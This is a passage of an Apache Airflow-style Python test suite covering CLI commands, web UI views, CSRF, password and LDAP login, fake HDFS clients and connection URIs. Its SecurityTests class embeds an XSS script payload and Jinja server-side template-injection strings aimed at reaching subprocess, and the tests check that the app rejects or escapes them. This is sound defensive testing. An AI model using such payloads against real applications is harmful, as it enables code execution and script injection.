'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
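        """Block until ``pidfile`` exists and contains a PID, then return that PID."""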
while True:
try:
with open(pidfile) as f:
return int(f.read())
            except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
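        """Extract the ``_csrf_token`` value from the first form in ``response``."""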
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
        except Exception:
            # exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
        except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
                'modification_time': 1481122343862,
                'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
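# Minimal usage sketch (not part of the original tests, shown only for
# illustration): the fakes above appear intended to stand in for real HDFS
# clients so tests can run without a cluster (an assumption; their consumers
# are not shown in this excerpt), e.g.
#
#   client = FakeHDFSHook().get_conn()
#   files = client.ls(['/datadirectory/datafile'])   # returns the canned file-status dict
#   assert files[0]['file_type'] == 'f'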
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
